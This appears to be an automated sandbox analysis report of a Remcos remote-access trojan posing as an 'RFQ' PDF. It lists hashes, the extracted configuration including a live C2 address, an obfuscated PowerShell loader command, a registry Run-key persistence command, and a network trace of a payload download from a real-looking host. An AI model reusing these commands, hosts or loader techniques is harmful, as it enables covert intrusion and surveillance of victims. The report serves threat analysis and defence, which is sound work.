Analysis

  • max time kernel
    26s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/08/2024, 13:43 UTC

General

  • Target

    RFQ-278TR8-EGUY-PDF.exe

  • Size

    566KB

  • MD5

    da86655a0232359a727a091ace033894

  • SHA1

    c5ba96e3b7f3ca40364d93852c49810c9ced5d90

  • SHA256

    ef5e922e7e1dc762301001557f0132d702b9f927efca9f70c91fd719ea1652a2

  • SHA512

    a58e76d31ce56e8b007518923599c2cd8cd9ec419f5cb930e2fe429e1a28256490a599d32b04cee7ca921b1e48b8c326440eade966fde62ac882e32d0494a868

  • SSDEEP

    12288:/TYbpC/5wByfpr4t6ssVfKF34YDc7L8lkflIQB5YT07KchD8ISNq3H:/TYdg5wByfp0UVW4YVl2I+5nKchDxSN4

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45.95.169.175:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-W6BTEW

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe
    "C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized " $Bestikke=Get-Content 'C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn';$Slambassinernes=$Bestikke.SubString(53011,3);.$Slambassinernes($Bestikke)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1512
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2216

Network

  • DNS (US)
    asjstudio.cl
    ImagingDevices.exe
    Remote address:
    8.8.8.8:53
    Request
    asjstudio.cl
    IN A
    Response
    asjstudio.cl
    IN A
    201.148.104.39
  • DNS (US)
    asjstudio.cl
    ImagingDevices.exe
    Remote address:
    8.8.8.8:53
    Request
    asjstudio.cl
    IN A
  • GET (CL)
    http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin
    ImagingDevices.exe
    Remote address:
    201.148.104.39:80
    Request
    GET /cXKaAfOrdfcYdKPug104.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: asjstudio.cl
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 30 Aug 2024 13:44:15 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade
    Last-Modified: Thu, 29 Aug 2024 08:59:18 GMT
    Accept-Ranges: bytes
    Content-Length: 494656
    Content-Type: application/octet-stream
  • 201.148.104.39:80
    http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin
    http
    ImagingDevices.exe
    9.1kB
    509.6kB
    189
    368

    HTTP Request

    GET http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin

    HTTP Response

    200
  • 8.8.8.8:53
    asjstudio.cl
    dns
    ImagingDevices.exe
    116 B
    74 B
    2
    1

    DNS Request

    asjstudio.cl

    DNS Request

    asjstudio.cl

    DNS Response

    201.148.104.39

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Ligestillingers.ini

    Filesize

    33B

    MD5

    d1146584cebab9c03dcaf52946f7a18c

    SHA1

    cd0452fef7a4ad38b8c70895a487ecac54430fc1

    SHA256

    630fb379230acf901b24a7e57cd31bd6b7a0b054e8e265b6f7ae6b7220cf41c2

    SHA512

    044f3c344e47cf298b69541c5337b767f0bcca3819caff7ad68f24da72bfe36cd5dc54261b07ff2c2338ea75873523fd29b97cb728f9dde6a0882d6855273092

  • C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Tffeldyrene.Svu

    Filesize

    313KB

    MD5

    4868e8f6d3c4a685c65a0af8b88e33a2

    SHA1

    076a7cce739a778df2088a77a2978f8f8bad2bad

    SHA256

    65ae30c7a987b8b3ebbc96969343ae59033c9817a3683ebb5ac999bed93cb2ab

    SHA512

    9eb1c07208756befa71fdcc29be30d4ea73e3d48a9828eeb78e1851a9e287220d3e2e55aef49cc0e3ad883ef4f427367b740fb21d65b7b0e4c9e3cd5479b2814

  • C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn

    Filesize

    51KB

    MD5

    bbb124a1a42a8499a391dafad534321c

    SHA1

    38143905e4011753b569f3b0a0e4ba4c90a3d02c

    SHA256

    fccbcb9907193676c4840c9ab08ecec0058b9e650efc4971dd0d92fd15b575b5

    SHA512

    01449caa6effed3f6502d5c980f9a5683d2eb99dc247d29dbb79c9737c8f59a6dc5ee787ba0ad75ab6ba2f3b8db048fd4cd76765c704b6ae76fe4e190f1b8669

  • memory/2576-158-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-159-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-160-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-157-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-162-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-156-0x0000000074671000-0x0000000074672000-memory.dmp

    Filesize

    4KB

  • memory/2576-164-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-165-0x0000000006850000-0x000000000B8E9000-memory.dmp

    Filesize

    80.6MB

  • memory/2576-166-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2980-169-0x00000000009B0000-0x0000000001A12000-memory.dmp

    Filesize

    16.4MB

  • memory/2980-171-0x00000000009B0000-0x0000000001A12000-memory.dmp

    Filesize

    16.4MB
